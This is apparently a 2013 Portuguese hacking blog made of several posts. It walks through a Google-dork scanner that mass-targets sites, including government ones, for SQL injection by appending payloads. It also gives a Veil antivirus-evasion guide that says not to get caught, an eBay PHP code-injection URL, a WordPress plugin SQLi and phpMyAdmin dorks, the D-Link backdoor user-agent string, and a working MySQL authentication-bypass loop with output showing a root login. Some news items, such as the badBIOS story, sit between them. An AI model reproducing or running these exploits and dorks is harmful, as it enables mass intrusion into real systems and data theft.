Parceiro: Camisetas Hacker

Camisetas para Nerds & Hackers

quarta-feira, 18 de dezembro de 2013

Tutorial SCANNER INURLBR 1.0 / INTERFACE

======[SCANNER INURLBR 1.0 / INTERFACE]=======

Tutorial SCANNER INURLBR 1.0 / INTERFACE


Scanner INURLBR utiliza o motor de 
Busca Google para achar seus alvos.
---------------------------------------------------------------------------------------------

BUSCA POSSÍVEIS VULNERABILIDADES
SQLI(MySQL,MS ACCESS,Microsoft SQL Server,ORACLE,POSTGRESQL)
OU ERROS DE PROGRAMAÇÃO.
OPÇÕES PARA SETAR PROXY.
MUDAR O MOTOR DE BUSCA GOOGLE 202 DISPONÍVEIS.
SETAR EXPLOIT e PERSONALIZA-LO.
PERSONALIZAR PROCURA DE ERROS DENTRO DE CADA URL ENCONTRADA.
---------------------------------------------------------------------------------------------
VÍDEO:



Baixar SCRIPT INURLBR INTERFACE:
https://code.google.com/p/scanner-inurl/

Baixar servidor web xampp:
http://sourceforge.net/projects/xampp/ 
No caso já tenho o servidor web.

Depois do servidor instalado & já iniciado.
Cole seu script INURL na seguinte pasta.

PASTA=> C:\xampp\htdocs\
Coloque o nome do seu script como bot.php
---------------------------------------------------------------------------------------------

Abrindo o scanner...
Quando o arquivo é iniciado no navegador o mesmo
imprime "SEM ACESSO!".

Pois temos uma sec simples.

<CODE>
if (isset($_GET['senha']) && $_GET['senha'] == 'googleinurl') {
    $_SESSION['valida'] = 1; //SETANDO O VALIDADOR DA PAGINA
}
</CODE>

Assim fica o acesso:

URL: http://localhost/bot.php?senha=googleinurl

---------------------------------------------------------------------------------------------


Agora vamos efetuar uma pesquisa simples.
Configuração:

 -*DORK...: O QUE VAI SER BUSCADO||Operadores avançados do Google.

 - PROXY + PORTA..: Caso seja bloquiado pelo Google use um proxy.

 - HOST GOOGLE..: Escolha entre 202 Domínios do google para efetuar
 sua busca.

 - *ARQUIVO SAÍDA.:ONDE VAI SER SALVO SEUS RESULTADOS DE BUSCA.

 - 0xEXPL01T.: PARÂMETRO QUE DEVE SER INJETADO A CADA URL, NO FINAL
 DAS URL'S ENCONTRADAS.
 Assim pode ser injetado uma string que gere erros ou manipulem o servidor.

 - *BUSCAR ERROS: [ PADRÃO ] /  (x)[ PERSONALIZADO ]
 VOU EXPLICAR O PERSONALIZADO  PRIMEIRO.

 - ACHAR ERRO.:É usado junto com a opção *BUSCAR ERROS: PERSONALIZADO.
 Pois foge do padrão de erros SQLI ou ERROS de programação ja configurados
 no script.
 Digamos que você deseja encontrar sites do governo que tenha a frase
 "Municipal".
 Usamos uma dork
 DORK=> site:.rj.gov.br  / Vai listar todos sites do governos Rio de Janeiro.
 ACHAR ERRO.:Municipal  / Vai procurar a palavra "Municipal" dentro das url's
 encontradas com a Dork acima.
 VAMOS LÁ.....
 AGORA VAMOS AGUARDAR....
 Depois de alguns minutos....
 O Scanner valida todo o html da url.
 agora vamos para busca de erros padrão do script.
---------------------------------------------------------------------------------------------

 - *BUSCAR ERROS: (x)[ PADRÃO ] /  [ PERSONALIZADO ]
 PADRÃO  Busca erros no modo padrão é buscar erros SQLI + Erros de programação.
 Vamos ver quais são os erros padrões do script.
 Pode ou não ser junto com exploit isso vai depender de sua dork.
 Algumas dorks já forçam o buscador a listar sites com erros.
 Em outras situações usamos o exploit para gerar o erro desejado.
 
<CODE>
#ERROS MYSQL
$erro['MYSQL-01'] = 'mysql_';
$erro['MYSQL-02'] = 'You have an error in your SQL syntax;';
$erro['MYSQL-03'] = 'Warning: mysql_';
$erro['MYSQL-04'] = 'function.mysql';
$erro['MYSQL-05'] = 'MySQL result index';
$erro['MYSQL-06'] = 'syntax;';
$erro['MYSQL-07'] = 'MySQL';
#ERROS MICROSOFT
$erro['MICROSOFT-01'] = 'Microsoft JET Database';
$erro['MICROSOFT-02'] = 'ODBC Microsoft Access Driver';
$erro['MICROSOFT-03'] = '500 - Internal server error';
$erro['MICROSOFT-04'] = 'Microsoft OLE DB Provider';
$erro['MICROSOFT-05'] = 'Unclosed quotes';
$erro['MICROSOFT-06'] = 'ADODB.Command';
$erro['MICROSOFT-07'] = 'ADODB.Field error';
$erro['MICROSOFT-08'] = 'Microsoft VBScript';
#ERROS ORACLE
$erro['ORACLE-01'] = 'Microsoft OLE DB Provider for Oracle';
$erro['ORACLE-02'] = 'ORA-';
#ERROS POSTGRESQL
$erro['POSTGRESQL-01'] = 'pg_';
$erro['POSTGRESQL-02'] = 'Warning: pg_';
$erro['POSTGRESQL-03'] = 'PostgreSql Error:';
#ERROS PHP
$erro['ERROPHP-01'] = 'Warning: include';
$erro['ERROPHP-02'] = 'Fatal error: include';
$erro['ERROPHP-03'] = 'Warning: require';
$erro['ERROPHP-04'] = 'Fatal error: require';
$erro['ERROPHP-05'] = 'ADODB_Exception';
#ERROS ASP
$erro['ERROASP-01'] = 'Version Information: Microsoft .NET Framework';
$erro['ERROASP-02'] = "Server.Execute Error";
#ERROS INDEFINIDOS
$erro['INDEFINIDO-01'] = 'SQL';
$erro['INDEFINIDO-02'] = 'Fatal error';
$erro['INDEFINIDO-03'] = 'Warning';
</CODE>
---------------------------------------------------------------------------------------------
AGORA VAMOS USAR O MODO SIMPLES COM EXPLOIT PADRÃO SQLI.

Exemplo de uso

DORK[0]=> inurl:cgi/cgilua.exe/sys/start.htm?sid=1

Com essa dork ele vai buscar na url cgi/cgilua.exe/sys/start.htm?sid=1[SEU EXPLOIT]
E injetar o exploit no final de cada resultado.
Ficamdo da seguinte forma:

http://www.site01.com.br/pasta/cgi/cgilua.exe/sys/start.htm?sid=1'0x272D2D3B
http://www.site02.com.br/cgi/cgilua.exe/sys/start.htm?sid=5'0x272D2D3B
http://site03.gov.br/pasta1/pasta2/cgi/cgilua.exe/sys/start.htm?sid=2'0x272D2D3B

O script vai executar internamente as urls encontradas + Exploits.
Achando algum erro padrão dentro do html da pagina é logo destacado como vull.

Vamos ver na pratica.. ? ... go go go go !
Agora vamos esperar....
Vamos testar mais uma busca....

As dorks aé.... use sua criatividade....

http://blog.inurl.com.br/2013/12/usando-sncanner-inurl-para-achar-falhas.html

terça-feira, 17 de dezembro de 2013

Bypass AV com Veil VoidPointer codificação de payload

VEIL
Bypass AV com  Veil VoidPointer codificação  de payload

Véu ou Manto em português.

Após a realização de diversos tipos de codificação da carga, aparentemente, ainda tem aqueles exe que não pode passar por algum anti-vírus e isso é foda, Mas com Veil  uma maneira poderosa para resolver este problema.

ferramenta que nós precisamos é de veil.py

Veil é uma ferramenta desenhada para gerar cargas Metasploit que ignoram soluções comuns anti-vírus.

Linux
Use Kali (x86) e todas as dependências são pré-instalados
ou -
Instale Python 2.7
Instale PyCrypto> = 2,3

Veil foi projetado para rodar em Kali Linux, mas deve funcionar em qualquer sistema capaz de executar scripts python. Basta ligar para Veil a partir da linha de comando, e seguir o menu para gerar uma carga útil. Ao criar o payload, Veil vai perguntar se você gostaria que o arquivo de carga útil a ser convertido em um arquivo executável por PyInstaller ou Py2Exe.

Se estiver usando PyInstaller, Veil irá converter sua carga em um executável dentro de Kali.

Se estiver usando Py2Exe, Veil criará três arquivos:

payload.py - O arquivo de carga útil
setup.py - arquivo necessário para Py2Exe
runme.bat - Batch script para compilar a carga em um executável do Windows
Mova todos os três arquivos em sua máquina Windows com o Python instalado. Todos os três arquivos devem ser colocados na raiz do diretório Python foi instalado (provavelmente C: \ Python27). Execute o script de lote para converter o script Python em um formato executável.

Coloque o arquivo executável em sua máquina-alvo através de todos os meios necessários e não seja pego!

Baixar:
# git clone https://github.com/ChrisTruncer/Veil.git

Instalando:
# cd /Veil/setup/ && setup.sh

domingo, 15 de dezembro de 2013

Hacker demonstra "execução remota de código PHP" vulnerabilidade no site EBay.


Remote Code Execution EBay
Hacker demonstra "execução remota de código PHP" vulnerabilidade no site EBay.


Hacker demonstra "execução remota de código PHP" vulnerabilidade no site EBay.

Em um vídeo de demonstração, ele explorou a falha RCE no site eBay, e conseguiu exibir a saída da function nativa do php  phpinfo(), apenas modificando a URL e injetar código.

[URL - ALVO ] https://sea.ebay.com/search/?q=david&catidd=1 

Agora injetando o PHP.
[URL - MODIFICADA] https://sea.ebay.com/search/?q[0]=david&q[1]=sec{${phpinfo()}}&catidd=1


Essa execução só é possível se a página de 'pesquisa' está recebendo "q" valor do parâmetro usando alguma função LOOP como "foreach ()". Muito provavelmente código no final do servidor deve ser algo como:

//php
foreach($_GET['q'] as $dados)
{
 if $dados com sucesso é capaz de ignorar algumas funções de filtro de entrada
{
eval("executar algo aqui  $dados");
}
}
//php

Vídeo:
OBS: A falha já foi corrigida.
Fonte:thehackernews.

Wordpress formcraft Plugin Sql Injection Mais SCANNER INURL

Wordpress formcraft Plugin Sql Injection


#################################################################################
# Exploit Author : Ashiyane Digital Security Team
#
#DORK[0] inurl:/wp-content/plugins/formcraft
#DORK[1] inurl:/wp-content/plugins/formcraft/form.php?id=
#
# Testado: Windows , Linux
#################################################################################
# Tipo Exploit : Sql Injection
#
# Local: [alvo]/wp-content/plugins/formcraft/form.php?id=[Sql]
# Exploit-DB Note:
# Injeção de exploit: form.php?id=1%20and%20 1=1
# Exploit: http://www.exploit-db.com/exploits/30002/
#################################################################################

Usando o  SCANNER INURL 1.0 - INTERFACE para capturar URL's com esse tipo de falha.
Down: https://code.google.com/p/scanner-inurl/


CONFIGURAÇÃO
Wordpress formcraft Plugin Sql Injection SCANNER INURL
RESULTADO
Wordpress formcraft Plugin Sql Injection SCANNER INURL RESULTADO

TOTAL DE URL's: 78

EXPLOIT USADO:

DORK: inurl:/wp-content/plugins/formcraft/form.php?id=

TIPO DE ERRO: PERSONALIZADO

PROCURAR ERRO:/plugins/formcraft/js/form.js?ver=

TOTAL DE POSSÍVEIS VULL: 47

ARQUIVO COM RESULTADO: resultados.txt

terça-feira, 10 de dezembro de 2013

Usando SNCANNER INURL para achar falhas em aplicações CGILua

Exploitando CGILua
Usando SNCANNER INURL para achar falhas em aplicações CGILua

O CGILua' é uma ferramenta que permite criar páginas Web dinâmicas e manipular a inserção de dados por meio de formulários Web.
ID de referências para cada página tem um ID específico ("sid") que o quadro utiliza na maioria das URLs.

EXPLOIT USADO: '0x272D2D3B

DORK[1]: CGILua 3.2.1 CGI
Filtrando domínio.
DORK[2]: site:.gov.br intext:"CGILua 3.2.1 CGI"
DORK[3]: inurl:cgi/cgilua.exe/sys/start.htm?sid=1
DORK[4]: inurl:"cgi/cgilua.exe/"


Usando SCANNER INURL para achar possíveis falhas:

TOTAL DE URL's: 75

TOTAL DE POSSÍVEIS VULL: 18

ARQUIVO COM RESULTADO: resultados.txt

http://blog.inurl.com.br/2013/09/cgilua-321-cgi-exploit.html

Scanner INURL:
https://code.google.com/p/scanner-inurl/

domingo, 8 de dezembro de 2013

Malware que as transferências de dados roubados usa sinais de áudio.

CONHEÇA O badBIOS
Malware que as transferências de dados roubados usando sinais de áudio.

Se você acha que um computador que não está conectado a uma rede, não tem nenhum aparelho USB ligado a ele e não aceita qualquer tipo de solicitações de conexão de eletrônicos são razoavelmente seguras contra hackers ou  qualquer malware, então você está errado .

Aqui temos uma informação  chocante que alguns cientistas alemães desenvolveram um conceito novo de Malware, poderia permitir que hacker's infectem computadores e outros dispositivos digitais usando apenas sinais de áudio inaudível .

A capacidade de colmatar uma lacuna de ar pode ser um vetor de infecção potente. Imaginem, um ataque cibernético através de ondas sonoras de alta freqüência para infectar máquinas, onde os dados roubados também podem ser transferidos de volta ao atacante sem uma conexão de rede , soa muito aterrorizante ?

Quando , há algumas semanas , um pesquisador de segurança Dragos Ruiu alegou badBIOS de malware apelidado permitido máquinas infectadas para se comunicar usando as ondas sonoras só, significa que os dispositivos são fisicamente desconectado de quaisquer redes, incluindo a internet , as pessoas diziam que ele era louco, pois bem ele provou o contrario.

Quando , há algumas semanas , um pesquisador de segurança Dragos Ruiu alegou badBIOS de malware apelidado permitido máquinas infectadas para se comunicar usando as ondas sonoras só, significa que os dispositivos são fisicamente desconectado de quaisquer redes, incluindo a internet , as pessoas diziam que ele era louco, pois bem ele provou o contrario.



Mas agora os pesquisadores alemães publicaram um artigo sobre a forma como o malware pode ser projetada para atravessar a abertura de ar , transmitindo informações através de alto-falantes e gravá-la via microfone.

Ao invés de confiar em TCP- IP , eles usaram uma pilha de rede originalmente desenvolvida para a comunicação subaquática e o sinal foi propagada através do uso de um modem definido por software com base no projeto GNU Radio.

Em um cenário de pirataria , " A vítima infectado envia todas as teclas gravadas para a rede acústico secreta. Drones infectados encaminhar as informações keystroke dentro da rede secreta até o atacante é atingido, que agora é capaz de ler a entrada de teclado atual da vítima infectada de um lugar distante .

Em um cenário de pirataria , " A vítima infectado envia todas as teclas gravadas para a rede acústico secreta. Drones infectados encaminhar as informações keystroke dentro da rede secreta até o atacante é atingido, que agora é capaz de ler a entrada de teclado atual da vítima infectada de um lugar distante .




Em outro cenário, os pesquisadores utilizaram as ondas sonoras para enviar informações keystroke a um computador conectado à rede , que , em seguida, enviou a informação para o atacante via e-mail.

Embora a pesquisa não prova badBIOS reivindicações de Dragos Ruiu , mas mostra que, mesmo se o sistema for desligado de qualquer rede , ainda pode estar vulnerável a ataques. No entanto, eu gostaria de apreciar Dragos dedicação sobre badBIOS pesquisa porque este conceito extraordinário foi introduzido pela primeira vez apenas por ele.

Pesquisadores POC Malware é capaz de transferir dados a 20 bits por apenas a segunda , que é muito baixa, mas que ainda é capaz de transferir sua senha ou número de cartão de crédito para o hacker em poucos segundos .

Algumas medidas preventivas básicas se pode adotar para se proteger contra este tipo de malware são:
Desligar os dispositivos de entrada e saída de áudio do sistema.
Empregar filtragem de áudio que bloqueia faixas de alta freqüência.
Usando um Audio Intrusion Detection Guard.

O nome do vírus se deve ao local onde ele se armazena: ele seria capaz de infectar o BIOS (Sistema Básico de Entrada/Saída) ou UEFI, equivalente em computadores mais recentes. O BIOS é o software básico responsável pelo funcionamento da placa-mãe do computador e nenhum vírus já disseminado em larga escala infectou esse software. O local não é examinado por antivírus.

Uma das características do badBIOS que mais tem dividido opiniões é sua capacidade de se comunicar por ondas de som inaudíveis para o ser humano. Dessa forma, mesmo um computador desconectado da rede poderia continuar transmitindo informações para outros infectados para transmitir dados roubados. O que causa dúvida, porém, é o fato de que os microfones e caixas de som usados na maioria dos computadores sejam de qualidade muito baixa para viabilizar essa comunicação em uma faixa inaudível.

Mesmo assim, especialistas concordam que a maioria das ações do vírus seria plausível. Complicadas de serem todas colocadas em um único código de maneira funcional, sim, mas nada completamente impossível.

O especialista que diz ser vítima do ataque, Dragos Ruiu, é responsável pela organização de três conferências de segurança. Ele não é “qualquer um”, o que dá crédito às revelações que vem fazendo.

Por outro lado, Ruiu diz que tem sofrido o ataque há três anos, mas só agora veio a público com as informações. Além disso, não há nenhuma cópia do código malicioso para análise independente. Ruiu publicou um post no Twitter com um link para a BIOS supostamente infectada. Usuários do site Reddit analisaram o código e não encontraram nada que aponte para uma infecção.

A fabricante de antivírus Sophos também fez sua análise, com uma conclusão semelhante: o código é uma BIOS de um notebook Dell, sem nenhuma alteração.

Outros especialistas também analisaram o código. Tavis Ormandy, conhecido especialista do Google que já identificou diversas falhas de segurança, aconselhou a Ruiu “dar um tempo” nessa história, depois de sugerir que ele não acreditaria em uma análise que aponta para uma situação normal.

Ruiu, porém, parece determinado a levar a história adiante: outros especialistas agora estariam com contato físico com os computadores infectados e poderiam verificar se há alguma anormalidade ou não. “Vamos ter uma análise de terceiros para descobrir se estou ficando louco ou se achamos algo significativo. E eu não acho que estou ficando louco”, afirmou o especialista ao site “Ars Technica”.

O badBIOS é mesmo “possível”, mas, se ele for mesmo verdade, a sofisticação em ataques direcionados terá atingido um nível muito superior a qualquer coisa já vista, e talvez será preciso repensar completamente as formas de proteger e projetar os sistemas informatizados.

Vamos ver como as empresas de antivírus irá lidar com tais ameaças para proteger os usuários domésticos.

Fonte:http://thehackernews.com/2013/12/Malware-Inaudible-Audio-signals-badbios-virus.html

quinta-feira, 5 de dezembro de 2013

Liberado 'netool.sh V3.4' (estável)

netool.sh V3.4

---------------------------------------------------------------------------------------------------------
Liberado 'netool.sh V3.4' (estável)
---------------------------------------------------------------------------------------------------------


netool.sh é um script em bash para automatizar frameworks como Nmap , redes de deriva , sslstrip ,
Metasploit e Ettercap MITM ataques . esse script faz com que seja fácil, tarefas como
SNIFFING tráfego TCP / UDP, ataques ManInTheMiddle , SSLsniff , falsificação de DNS , o outro
módulos disponíveis são:

recuperar metadados do site alvo, ataques DoS dentro da rede externa / local ,
também usa macchanger para chamariz scans, usa o nmap para procurar uma porta especificada aberto
no externo / lan local, mudança / ver o seu endereço mac, mudar o meu PC hostname, também pode
executar TCP / UDP pacotes manipulação usando etter.filters , também como a habilidade de
capturar imagens de navegação na web -browser na máquina de destino sob ataque MITM e
realiza uma varredura vuln ao web-site -alvo usando websecurify firefox- addon , também
usos [ msfpayload + + msfencode msfcli ] para ter o controle remoto da máquina de destino, também
veio com [ root3.rb ] meterpreter ruby script de auxiliar, e um módulo para instalar / editar
o script meterpreter e atualizar o banco de dados Metasploit automática, busca de
alvos de geolocalização, ou use [ webcrawler.py ] módulo para procurar páginas de login de administrador ,
directorys site, webshells.php plantada no site , scanner vulns upload de arquivo comum
[ LFI ] e procurar XSS sites vuln usando (Dorks,Strings) do google , também usa um módulo para
automatizado alguns ataques mais MITM ( dns- paródia + metasploit + phishing, e uma coleção de
( Metasploit ) exploits automatizados.

Ping remote target or web domain
Show Local Connections (see my machine connections)
Show my Ip address and arp cache
see/change macaddress
change my PC hostname
Scan Local network (search for live hosts inside local network)
search in external lan for hosts
Scan remote host (using nmap to perform a scan to target machine)
execute Nmap command (direct from shell)
search for target geo-location
Open router config page
Ip tracer whois (open website database whois and geo-location)
WebCrawler (open websecurify webcrawler website)
DDoS java Script (perform DDoS attacks external network)
Retrieve metadata (from a web-domain)
Config ettercap (etter.conf))
Launch MITM (using ettercap to perform MITM)
show URLs visited (by target machine under MITM)
Sniff remote pics (by target machine under MITM)
sniff SSL-HTTPS logins
share files in local lan
Dns-Spoofing (redirect web-domains to another ip address)
DoS attack (local netwok)
Compile etter.filters
execute ettercap filter
webcrawler
post-exploitation auxiliary modules
r00tsect0r automated exploits
common user password profiler
d. Delete lock folders
a. about netool
q. quit

Vídeo (version 3.4)


---------------------------------------------------------------------------------------------------------
Confira as novidades
http://sourceforge.net/p/netoolsh/wiki/bug-fixes-release/

Confira o WIKI:
http://sourceforge.net/p/netoolsh/wiki/netool.sh%20script%20project/

Projeto:
http://sourceforge.net/projects/netoolsh/
---------------------------------------------------------------------------------------------------------

segunda-feira, 2 de dezembro de 2013

Backdoor encontrado em roteadores D-Link

Backdoor encontrado em roteadores D-Link

Em outubro, um pesquisador de segurança Craig Heffner "descobriu uma vulnerabilidade backdoor (CVE-2013-6027) em determinados roteadores D-Link que permitem hackers alterem a configuração do roteador sem um nome de usuário ou senha.

A D-Link lançou nova versão do firmware para vários modelos de roteadores vulneráveis​​, que corrige o backdoor não autorizado acesso de administrador.

Heffner descobriu que a interface web para alguns roteadores D-Link pode ser acessado se o user agent string estive definido como xmlset_roodkcableoj28840ybtide

D-Link estava trabalhando com Heffner e outros pesquisadores de segurança, para descobrir mais sobre o backdoor e agora a empresa lançou as atualizações para os seguintes modelos:



  • DIR-100
  • DIR-120
  • DI-524
  • DI-524UP
  • DI-604UP
  • DI-604+
  • DI-624S
  • TM-G5240


Roteadores da marca Planex tem o mesmo firmware:


  • BRL-04UR
  • BRL-04CW
D-Link estava trabalhando com Heffner e outros pesquisadores de segurança, para descobrir mais sobre o backdoor e agora a empresa lançou as atualizações para os seguintes modelos:


A empresa aconselha os usuários a não ativar o recurso de gerenciamento remoto, uma vez que irá permitir que usuários mal-intencionados acessem seu roteador, E também alertou para ignorar e-mails não solicitados: Se você receber e-mails não solicitados que se relaciona com as vulnerabilidades de segurança e pedir-lhe para fazer uma ação, por favor, ignore-o. Quando você clica em links de tais e-mails, que poderia permitir que pessoas não autorizadas a acessar o seu router. Nem D-Link, nem os seus parceiros e revendedores irá enviar mensagens não solicitadas, onde você está convidado a clicar ou instalar alguma coisa.


NMAP tambem lançou um script  no mês passado para fazer a varredura e encontrar os roteadores vulneráveis​​.
Script NMAP: http://seclists.org/nmap-dev/2013/q4/att-33/http-dlink-backdoor.nse
Usando:

nmap -sV --script http-dlink-backdoor SEU_ALVO

Tuto nmap:http://www.cyberciti.biz/networking/nmap-command-examples-tutorials/

Outro script com a mesma logica porem feito em PYTHON:
http://pastebin.com/raw.php?i=vbiG42VD




Dork obter acesso ao painel phpMyadmin.

phpMyadmin sem senha
Acesso ao phpMyadmin sem senha

phpMyAdmin é um Aplicativo Web desenvolvido em PHP para administração do MySQL pela Internet. A partir deste sistema é possível criar e remover bases de dados, criar, remover e alterar tabelas, inserir, remover e editar campos, executar códigos SQL e manipular campos chaves. O phpMyAdmin é muito utilizado por programadores web que muitas vezes necessitam manipular bases de dados. Normalmente, o phpMyAdmin é tratado como uma ferramenta obrigatória em quase todas as hospedagens da web, além de pacotes off-line, como o WAMPServer, XAMPP, EasyPHP e PHP Triad.
Ref:http://pt.wikipedia.org/wiki/PhpMyAdmin


DORK[0]: ext:php  intext:"SQL-query" intext:"Without PHP Code" & intitle:("phpMyAdmin 2*)

DORK[1]: inurl:.php? intext:"CHARACTER_SETS,COLLATIONS" intitle:phpmyadmin intext:"Field_name"

DORK[2]: inurl:.php? intext:"information_schema" intitle:phpmyadmin intext:"Field_name"

DORK[3]: ext:php  intext:"SQL-query" intitle:phpmyadmin & intext:"Show this query here again "

DORK[4]: ext:php  intext:"SQL-query" intitle:phpmyadmin intext:"Field_name"

DORK[5]: intitle:phpmyadmin intext:" [Edit] [Explain SQL]"

DORK[6]: site:br intitle:phpmyadmin intext:" [Edit] [Explain SQL]"


As Dorks acima foram baseadas na seguinte:
http://www.exploit-db.com/ghdb/3862/

sexta-feira, 29 de novembro de 2013

Conheça MySQL Authentication Bypass Exploit.


Conheça MySQL Authentication Bypass Exploit.


MySQL permite a autenticação de qualquer usuário válido (ou seja, root ativos em 99% das instalações) sem a necessidade de senha, utilizando apenas um simples LOOP  de tentativas exaustivo de conexões.

Todas as versões do MySQL e MariaDB até 5.1.61, 5.2.11, 5.3.5, 5.5.22 são vulnerável.
Versões de MariaDB 5.1.62, 5.2.12, 5.3.6, 5.5.23 não são.
Versões do MySQL 5.1.63 de, 5.5.24, 5.6.6 não são.

Esta questão foi atribuído um ID:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2122

O que significa que, se alguém sabe um nome de usuário para se conectar (e "root" quase sempre existe), ela pode se conectar usando * qualquer senha * repetindo tentativas de conexão. ~ 300 tentativas leva apenas uma fração de segundo, então basicamente conta a proteção por senha é tão bom como inexistente.

Qualquer cliente vai fazer, não há necessidade de uma biblioteca libmysqlclient especial.

EXPLOIT CÓDIGO PYTHON:

#!/usr/bin/python
import subprocess

  1. import subprocess
  2.  
  3. ipaddr = raw_input("Enter the IP address of the mysql server: ")
  4.  
  5. while 1:
  6.     subprocess.Popen("mysql --host=%s -u root mysql --password=blah" % (ipaddr), shell=True).wait()


EXPLOIT CÓDIGO EM SHELLSCRIPT:

while true; do mysql -u root --password=senha -h 127.0.0.1 2>/dev/null; done


Executando comando exploit em python:

google@inurl:~# python mysql.py
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)

Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 24598
Server version: 5.1.62-0ubuntu0.11.10.1 (Ubuntu)

Copyright (c) 2000, 2011, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the current input statement.

mysql>

Exploit:
PYTHON
http://pastebin.com/JuHZX7zJ
PHP
http://pastebin.com/CTYx2hUt

Darknets e servidores ocultos: Identificar a verdadeira identidade IP. Rede I2P

ARTIGO FEITO POR: Adrian Crenshaw
Apresentado no evento BLACK HAT DC 2011 


ARTIGO FEITO POR: Adrian Crenshaw Apresentado no evento BLACK HAT DC 2011


Este artigo irá apresentar a pesquisa em serviços hospedados internamente no I2P
rede anonimato , com foco em I2P hospedado sites conhecidos como eepSites , e como o
verdadeira identidade do anfitrião Internet fornecendo o serviço pode ser identificado por meio de informações vazamentos na camada de aplicação . Ao saber a identidade do host da Internet fornecendo o serviço , o conjunto de anonimato da pessoa ou grupo que administra o serviço pode ser grandemente reduzida , se não completamente eliminado .

O objetivo principal deste trabalho será o de testar a anonimato fornecido pela I2P para hospedagem
eepSites , concentrando-se principalmente na camada e aplicação erros administradores e desenvolvedores
podem fazer que poderia expor um prestador de serviços de identidade ou reduzir os conjunto1 anonimato eles fazem parte. Vamos mostrar os ataques com base em a interseção de usuários I2P hospedagem
eepSites em IPs públicos com hospedagem virtual, o uso de aplicação web comum vulnerabilidades para revelar o voltado para a Internet IP de um eepSite , bem como em geral a informação que pode ser recolhida, relativa os nós participantes do anonimato I2P rede .
introdução :

I2P2 é uma Darknet distribuído usando o modelo mixnet , de certa forma semelhante ao Tor, mas especializada no fornecimento interno serviços em vez de out- proxy para o Internet em geral. O nome I2P foi original 1 Um conjunto anonimato é o número total de possíveis candidatos para a identidade de um entidade .
Reduzindo os meios set anonimato que você pode diminuir os suspeitos.
2 Todos os detalhes de como I2P é implementado pode
ser encontrado em:

abreviação de " Invisível Internet Project", embora raramente é referido por esta longa
formar mais. Ele destina-se a actuar como um rede sobreposta no topo da Internet pública
adicionar anonimato e segurança. 


Um objetivo secundário seria a de permitir a identificação de certos grupos que a aplicação da lei pode ser
interessado na localização, especificamente pedófilos.
Essas metas são um pouco em probabilidades , uma vez que a aplicação da lei poderia usar o conhecimento para perseguir grupos para outro razões, e pedófilos poderia usar o conhecimento para ajudar a esconder-se, nem de que são desejados objetivos, mas com privacidade assuntos às vezes você tem que tomar a mal com o bem .
I2P foi escolhido como o plataforma já que menos pesquisa tem ido para ele versos Tor, mas muitas das mesmas idéias e técnicas deve ser aplicável tanto como sistemas que oferecem funcionalidade
semelhante quando se trata de serviços ocultos, que são HTTP baseado.

Artigo:
https://media.blackhat.com/bh-dc-11/Crenshaw/BlackHat_DC_2011_Crenshaw_Identifying_the_true_IP-wp.pdf

Curso OYS – [ Análise e Testes de Vulnerabilidades em Redes Corporativas ]

Curso OYS –  [ Análise e Testes de Vulnerabilidades em Redes Corporativas ]


Introdução à Segurança da Informação
Introdução ao Teste de Invasão e Ética Hacker
Google Hacking
Levantamento de Informações
Entendendo a Engenharia Social e o No-Tech Hacking
Varreduras ativas, passivas e furtivas de rede
Enumeração de informações e serviços
Trojans, Backdoors, Vírus, Rootkits e Worms
Ignorando Proteções
Técnicas de Força Bruta
Vulnerabilidades em aplicações web
SQL Injection
Elevação de Privilégios Locais
Testando o sistema
Smurf Attack
Técnicas de Sniffing
Exploits
Ataques a Servidores WEB
Metasploit Framework

Tamanho: 5,71 GB
[ 6 ] PARTES:
http://goo.gl/5G3dI7
http://goo.gl/NhjsSj
http://goo.gl/dCCSxr
http://goo.gl/LlQVpq
http://goo.gl/jkYALy
http://goo.gl/2ylqKV

$fonte::::: https://twitter.com/Cr4t3r

Está protegido ? conheça o open-source "ferret"


Está protegido ?
Você pode olhar para o open-source "ferret".
Ele analisa um monte de e-mail diferente (SMTP, POP, IMAP) e protocolos de bate-papo (MSN, Yahoo e AOL).


Você pode olhar para o open-source "ferret". Ele analisa um monte de e-mail diferente (SMTP, POP, IMAP) e protocolos de bate-papo (MSN, Yahoo e AOL).
Foi escrito em 2007. É improvável que qualquer engenheiro NSA tenha escrito algum código semelhante.
Além disso, o código é muito rápido, ele pode ser executado em razoável
ligações multi-gigabit - o tipo que você encontraria em torneiras subaquáticas de links de fibra óptica.


Foi escrito em 2007. É improvável que qualquer engenheiro NSA tenha escrito algum código semelhante. Além disso, o código é muito rápido, ele pode ser executado em razoável ligações multi-gigabit - o tipo que você encontraria em torneiras subaquáticas de links de fibra óptica.



Fonte:
http://www.blackhat.com/presentations/bh-dc-07/Maynor_Graham/Presentation/bh-dc-07-Maynor_Graham-up.pdf

Repositório oficial do SCANNER INURL

Repositório oficial do SCANNER INURL

Repositório oficial do SCANNER INURL.
Scanner INURL utiliza motor de busca Google para achar seus alvos.

O projeto SCANNER INURL com interface web será descontinuado.
Assim dando mais foco ao Scanner em linha de comando.

BUSCA POSSÍVEIS VULNERABILIDADES

SQLI(MySQL,MS ACCESS,Microsoft SQL Server,ORACLE,POSTGRESQL) OU ERROS DE PROGRAMAÇÃO.

OPÇÕES PARA SETAR PROXY.

MUDAR O MOTOR DE BUSCA GOOGLE 202 DISPONÍVEIS.

SETAR EXPLOIT.

PERSONALIZAR PROCURA DE ERROS DENTRO DE CADA URL ENCONTRADA.

GRUPO GOOGLEINURL BRASIL - PESQUISA AVANÇADA.

Repositório:
https://code.google.com/p/scanner-inurl/

